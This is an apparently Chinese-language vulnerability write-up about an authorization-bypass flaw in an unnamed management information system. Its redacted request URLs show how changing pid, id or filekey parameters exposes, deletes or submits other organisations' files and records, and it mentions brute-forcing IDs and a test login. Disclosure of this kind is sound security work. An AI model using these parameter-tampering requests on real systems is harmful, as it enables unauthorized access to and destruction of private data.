网络安全技术 ·

​某管理信息系统存在全局越权漏洞


文章来源: EDI安全

01

漏洞标题

某管理信息系统存在全局越权漏洞

02

漏洞类型

越权漏洞

03

漏洞等级

高危

04

漏洞地址

某标准化管理信息系统

http://xx.xx.xx.xx/

05

漏洞详情

某管理信息系统存在全局越权漏洞,可以全局修改已注册用户的单位信息及上传材料信息,可以越权下载文件,越权提交单位审核。

单位A正常查看:账户A aaaaaa/ceshi123。

0x01

漏洞一:项目简介替换pid全局越权查看

http://www.xxx.org.cn/xxx/Project/ProjectNew.aspx?pid=20200527152358&pname=werwer&paction=view

0x02

越权二:越权修改保存单位信息后,然后通过替换id或者是filekey参数(这两个值是一个值)越权查看、下载、删除B单位文件。

http://xx.xx.xx.xx/Admin/ListFilesView?app=xxxxx&serialno=workunit&filetree=workunit&id=21231653548457984&stepid=0&operateid=0&remark=
http://xx.xx.xx.xx/API/RPC/GetFiles?app=xxxxx&pageIndex=1&pageSize=1000&treeKey=workunit&filename=&serialNo=workunit&filekey=21231653548457984&stepId=0&operateId=0&GDCICSID_GDJSBZ=2fd315a0a95b13220d0d352a4066c5f0&SSOCOOKIENAME=ll_from=_=1595764430009

0x03

漏洞三:越权上传或者是越权提交单位审核

http://xx.xx.xxx/API/RPC/GetFilesCount?app=&treeKey=workunit&filename=&serialNo=workunit&filekey=21231653548457984&stepId=0&operateId=0&=de1a6fb2ff3804d010dae3e8bcf30706&SSOCOOKIENAME=&call_from=jssdk&_=1595766405241

上面可以根据在返回数据包的数据,来爆破此处越权使用的pid值:

http://xx.xx.xx.xx/API/RPC/GetFiles?app=&pageIndex=1&pageSize=1000&treeKey=workunit&filename=&serialNo=workunit&filekey=21231653548457984&stepId=0&operateId=0&=2fd315a0a95b13220d0d352a4066c5f0&SSOCOOKIENAME=&call_from=jssdk&_=1595764430009

获取id

06

漏洞危害

可以全局越权查看、修改、提交审核的单位/个人信息,并且可以上传、下载、删除所有单位/个人的附件材料,这些材料拿到很有可能就了解了整个单位或者是个人信息,商业竞争者拿到这些信息很有可能就会造成极大的危害。毕竟地产信息比较重要。

07

建议措施

做好权限的控制,当前用户只允许操作自己的业务。

PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负

参与评论